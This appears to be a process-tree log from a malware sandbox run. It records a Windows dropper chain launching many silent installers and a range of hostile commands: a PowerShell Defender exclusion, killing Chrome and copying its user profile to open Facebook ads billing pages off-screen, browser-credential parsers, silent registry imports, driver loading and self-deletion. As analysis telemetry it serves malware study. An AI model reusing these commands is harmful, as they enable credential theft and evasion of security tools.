C:\Users\Admin\AppData\Local\Temp\Lr8PzoLAG.exe"C:\Users\Admin\AppData\Local\Temp\Lr8PzoLAG.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-VQ5EM.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-VQ5EM.tmp\chashepro3.tmp" /SL5="$20406,1478410,58368,C:\Users\Admin\AppData\Local\Temp\h1f2oisflct\chashepro3.exe" /VERYSILENT1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-K96JT.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-K96JT.tmp\Setup3310.tmp" /SL5="$80234,802346,56832,C:\Users\Admin\AppData\Local\Temp\jo0ys2wv3sd\Setup3310.exe" /Verysilent /subid=5771⤵
-
C:\Users\Admin\AppData\Local\Temp\is-J6947.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-J6947.tmp\Setup.exe" /Verysilent2⤵
-
C:\Users\Admin\AppData\Local\Temp\is-1DE3O.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-1DE3O.tmp\Setup.tmp" /SL5="$30424,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-J6947.tmp\Setup.exe" /Verysilent3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\PictureLAb.exe" /Verysilent4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-ELF47.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-ELF47.tmp\PictureLAb.tmp" /SL5="$107EA,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\PictureLAb.exe" /Verysilent5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-MJD6E.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-MJD6E.tmp\Setup.exe" /VERYSILENT6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FHJTA.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-FHJTA.tmp\Setup.tmp" /SL5="$10894,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-MJD6E.tmp\Setup.exe" /VERYSILENT7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BKHKG.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-BKHKG.tmp\def.exe" /S /UID=lab2148⤵
-
C:\Program Files\Microsoft Office 15\GAMJVJLAUO\prolab.exe"C:\Program Files\Microsoft Office 15\GAMJVJLAUO\prolab.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-AUOG5.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-AUOG5.tmp\prolab.tmp" /SL5="$40702,575243,216576,C:\Program Files\Microsoft Office 15\GAMJVJLAUO\prolab.exe" /VERYSILENT10⤵
-
C:\Users\Admin\AppData\Local\Temp\e7-fc6f8-834-c999c-4595878ec6e96\Lynaqusesha.exe"C:\Users\Admin\AppData\Local\Temp\e7-fc6f8-834-c999c-4595878ec6e96\Lynaqusesha.exe"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zcmt0xz0.ih4\customer4.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\zcmt0xz0.ih4\customer4.exeC:\Users\Admin\AppData\Local\Temp\zcmt0xz0.ih4\customer4.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX5\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\main.exe"12⤵
-
C:\Windows\regedit.exeregedit /s chrome.reg13⤵
- Runs .reg file with regedit
-
C:\Windows\SYSTEM32\TASKKILL.exeTASKKILL /F /IM chrome.exe13⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chrome64.bat13⤵
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX5\chrome64.bat" h"15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffe95606e00,0x7ffe95606e10,0x7ffe95606e2017⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1716 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1668 /prefetch:217⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2208 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2972 /prefetch:117⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2844 /prefetch:117⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:117⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:117⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:117⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:117⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3972 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4324 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4192 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4240 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4268 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings17⤵
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff633227740,0x7ff633227750,0x7ff63322776018⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5284 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5412 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5040 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5152 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4960 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5040 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5096 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5112 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1640 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3400 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5300 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7871030185744378419,12920897569097467055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4816 /prefetch:817⤵
-
C:\Windows\regedit.exeregedit /s chrome-set.reg13⤵
- Runs .reg file with regedit
-
C:\Users\Admin\AppData\Local\Temp\RarSFX5\parse.exeparse.exe -f json -b firefox13⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX5\parse.exeparse.exe -f json -b chrome13⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX5\parse.exeparse.exe -f json -b edge13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hlliwzv5.sgp\askinstall18.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\hlliwzv5.sgp\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\hlliwzv5.sgp\askinstall18.exe11⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe12⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe13⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eizih0w0.rsx\md7_7dfj.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\eizih0w0.rsx\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\eizih0w0.rsx\md7_7dfj.exe11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zxqzhrwy.x10\privacytools5.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\zxqzhrwy.x10\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\zxqzhrwy.x10\privacytools5.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\zxqzhrwy.x10\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\zxqzhrwy.x10\privacytools5.exe12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bbc1yvx1.qao\GcleanerWW.exe /mixone & exit10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vnbbjwk0.cya\setup.exe /8-2222 & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\vnbbjwk0.cya\setup.exeC:\Users\Admin\AppData\Local\Temp\vnbbjwk0.cya\setup.exe /8-222211⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Falling-Glade"12⤵
-
C:\Program Files (x86)\Falling-Glade\7za.exe"C:\Program Files (x86)\Falling-Glade\7za.exe" e -p154.61.71.13 winamp-plugins.7z12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Falling-Glade\setup.exe" -map "C:\Program Files (x86)\Falling-Glade\WinmonProcessMonitor.sys""12⤵
-
C:\Program Files (x86)\Falling-Glade\setup.exe"C:\Program Files (x86)\Falling-Glade\setup.exe" -map "C:\Program Files (x86)\Falling-Glade\WinmonProcessMonitor.sys"13⤵
-
C:\Program Files (x86)\Falling-Glade\7za.exe"C:\Program Files (x86)\Falling-Glade\7za.exe" e -p154.61.71.13 winamp.7z12⤵
-
C:\Program Files (x86)\Falling-Glade\setup.exe"C:\Program Files (x86)\Falling-Glade\setup.exe" /8-222212⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ycbzhzop.mah\MultitimerFour.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\ycbzhzop.mah\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\ycbzhzop.mah\MultitimerFour.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\GA91IH1MOZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GA91IH1MOZ\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10412⤵
-
C:\Users\Admin\AppData\Local\Temp\GA91IH1MOZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GA91IH1MOZ\multitimer.exe" 1 3.1615300491.6047878b1e860 10413⤵
-
C:\Users\Admin\AppData\Local\Temp\GA91IH1MOZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GA91IH1MOZ\multitimer.exe" 2 3.1615300491.6047878b1e86014⤵
-
C:\Users\Admin\AppData\Local\Temp\13fl13jl1er\vict.exe"C:\Users\Admin\AppData\Local\Temp\13fl13jl1er\vict.exe" /VERYSILENT /id=53515⤵
-
C:\Users\Admin\AppData\Local\Temp\is-P8THM.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-P8THM.tmp\vict.tmp" /SL5="$40768,870426,780800,C:\Users\Admin\AppData\Local\Temp\13fl13jl1er\vict.exe" /VERYSILENT /id=53516⤵
-
C:\Users\Admin\AppData\Local\Temp\is-MGCLT.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-MGCLT.tmp\wimapi.exe" 53517⤵
-
C:\Users\Admin\AppData\Local\Temp\jdhwct441ec\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\jdhwct441ec\askinstall24.exe"15⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe16⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe17⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffe9b2e6e00,0x7ffe9b2e6e10,0x7ffe9b2e6e2017⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,5775718476859835049,11431065364806274855,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1684 /prefetch:817⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1608,5775718476859835049,11431065364806274855,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:217⤵
-
C:\Users\Admin\AppData\Local\Temp\nc2ohxc5b3l\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\nc2ohxc5b3l\chashepro3.exe" /VERYSILENT15⤵
-
C:\Users\Admin\AppData\Local\Temp\is-L8R3R.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-L8R3R.tmp\chashepro3.tmp" /SL5="$40758,1478410,58368,C:\Users\Admin\AppData\Local\Temp\nc2ohxc5b3l\chashepro3.exe" /VERYSILENT16⤵
-
C:\Users\Admin\AppData\Local\Temp\xcvmrvkdecg\lgme4j1eafn.exe"C:\Users\Admin\AppData\Local\Temp\xcvmrvkdecg\lgme4j1eafn.exe" /ustwo INSTALL15⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "lgme4j1eafn.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\xcvmrvkdecg\lgme4j1eafn.exe" & exit16⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "lgme4j1eafn.exe" /f17⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\uvmyhzjf1qm\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\uvmyhzjf1qm\Setup3310.exe" /Verysilent /subid=57715⤵
-
C:\Users\Admin\AppData\Local\Temp\is-C2VPK.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-C2VPK.tmp\Setup3310.tmp" /SL5="$504C8,802346,56832,C:\Users\Admin\AppData\Local\Temp\uvmyhzjf1qm\Setup3310.exe" /Verysilent /subid=57716⤵
-
C:\Users\Admin\AppData\Local\Temp\is-87R8S.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-87R8S.tmp\Setup.exe" /Verysilent17⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KTDDA.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-KTDDA.tmp\Setup.tmp" /SL5="$B0266,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-87R8S.tmp\Setup.exe" /Verysilent18⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\PictureLAb.exe" /Verysilent19⤵
-
C:\Users\Admin\AppData\Local\Temp\is-OBM1L.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-OBM1L.tmp\PictureLAb.tmp" /SL5="$804AE,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\PictureLAb.exe" /Verysilent20⤵
-
C:\Users\Admin\AppData\Local\Temp\is-Q0MQ6.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-Q0MQ6.tmp\Setup.exe" /VERYSILENT21⤵
-
C:\Users\Admin\AppData\Local\Temp\is-23VD5.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-23VD5.tmp\Setup.tmp" /SL5="$209BE,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-Q0MQ6.tmp\Setup.exe" /VERYSILENT22⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PQ035.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-PQ035.tmp\def.exe" /S /UID=lab21423⤵
-
C:\Users\Admin\AppData\Local\Temp\84-b9c7d-e07-57786-d36e469a2455c\SHaekaxabaesy.exe"C:\Users\Admin\AppData\Local\Temp\84-b9c7d-e07-57786-d36e469a2455c\SHaekaxabaesy.exe"24⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5aps2uyn.unc\customer4.exe & exit25⤵
-
C:\Users\Admin\AppData\Local\Temp\5aps2uyn.unc\customer4.exeC:\Users\Admin\AppData\Local\Temp\5aps2uyn.unc\customer4.exe26⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX6\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX6\main.exe"27⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pgiemmar.led\askinstall18.exe & exit25⤵
-
C:\Users\Admin\AppData\Local\Temp\pgiemmar.led\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\pgiemmar.led\askinstall18.exe26⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe27⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cgbyzqqy.1lk\md7_7dfj.exe & exit25⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jqh41qf0.3yc\privacytools5.exe & exit25⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\Delta.exe" /Verysilent19⤵
-
C:\Users\Admin\AppData\Local\Temp\is-VSS6H.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-VSS6H.tmp\Delta.tmp" /SL5="$60648,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\Delta.exe" /Verysilent20⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SV4M5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-SV4M5.tmp\Setup.exe" /VERYSILENT21⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\zznote.exe" /Verysilent19⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8TFQA.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-8TFQA.tmp\zznote.tmp" /SL5="$20A30,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-6IKHP.tmp\zznote.exe" /Verysilent20⤵
-
C:\Users\Admin\AppData\Local\Temp\4mdzoyi4uge\app.exe"C:\Users\Admin\AppData\Local\Temp\4mdzoyi4uge\app.exe" /8-2315⤵
-
